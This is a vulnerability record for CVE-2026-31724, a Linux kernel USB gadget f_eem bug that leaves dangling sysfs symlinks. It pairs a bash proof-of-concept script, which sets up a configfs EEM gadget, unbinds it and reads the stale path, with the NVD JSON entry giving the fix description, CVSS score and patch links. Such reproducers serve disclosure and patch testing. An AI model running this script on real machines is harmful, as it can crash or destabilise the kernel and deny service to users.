CVE-2026-31724

#!/bin/bash # PoC to reproduce the sysfs dangling symlink issue in Linux Kernel f_eem # This requires a system with USB Gadget configfs support. modprobe libcomposite # Setup USB Gadget directory GADGET_DIR="/sys/kernel/config/usb_gadget/poc_eem" mkdir -p $GADGET_DIR cd $GADGET_DIR # Configure basic device IDs echo 0x1d6b > idVendor echo 0x0104 > idProduct mkdir -p strings/0x409 echo "PoC" > strings/0x409/manufacturer echo "EEM Vuln" > strings/0x409/product # Create configuration mkdir -p configs/c.1/strings/0x409 echo "Config" > configs/c.1/strings/0x409/configuration # Create EEM function and link to config mkdir -p functions/eem.usb0 ln -s functions/eem.usb0 configs/c.1 # Find available UDC (USB Device Controller) UDC=$(ls /sys/class/udc | head -n 1) if [ -n "$UDC" ]; then echo "Activating Gadget with UDC: $UDC" echo $UDC > UDC # Sleep to allow initialization sleep 1 echo "Net device registered. Checking sysfs..." ls -l /sys/class/net/usb0 echo "Deactivating Gadget to trigger the vulnerability..." echo "" > UDC # At this point, the gadget device is destroyed but net_device might linger # causing a dangling symlink in sysfs. echo "Checking sysfs status after unbind..." ls -l /sys/class/net/usb0 # Attempt to access the dangling path (may cause error or crash) cat /sys/class/net/usb0/uevent 2>/dev/null && echo "Access OK" || echo "Access Failed (Dangling link)" else echo "No UDC available. Cannot test." fi # Cleanup cd / rm -rf $GADGET_DIR

{"cve": {"id": "CVE-2026-31724", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:34.833", "lastModified": "2026-05-07T17:00:23.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_eem: Fix net_device lifecycle with device_move\n\nThe net_device is allocated during function instance creation and\nregistered during the bind phase with the gadget device as its sysfs\nparent. When the function unbinds, the parent device is destroyed, but\nthe net_device survives, resulting in dangling sysfs symlinks:\n\nconsole:/ # ls -l /sys/class/net/usb0\nlrwxrwxrwx ... /sys/class/net/usb0 ->\n/sys/devices/platform/.../gadget.0/net/usb0\nconsole:/ # ls -l /sys/devices/platform/.../gadget.0/net/usb0\nls: .../gadget.0/net/usb0: No such file or directory\n\nUse device_move() to reparent the net_device between the gadget device\ntree and /sys/devices/virtual across bind and unbind cycles. During the\nfinal unbind, calling device_move(NULL) moves the net_device to the\nvirtual device tree before the gadget device is destroyed. On rebinding,\ndevice_move() reparents the device back under the new gadget, ensuring\nproper sysfs topology and power management ordering.\n\nTo maintain compatibility with legacy composite drivers (e.g., multi.c),\nthe bound flag is used to indicate whether the network device is shared\nand pre-registered during the legacy driver's bind phase."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.11.1", "versionEndExcluding": "6.12.81", "matchCriteriaId": "29787167-D14F-4508-BFBF-9E6689E0AD56"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/14730506b9e2a09d10c963a57a72ed528482fc15", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4ccdccff8febc5456aff684627f9a4c5c83b9346", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a6b8bce01a30a8c05c034bbc36c34845d65d644f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d9270c9a8118c1535409db926ac1e2545dc97b81", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}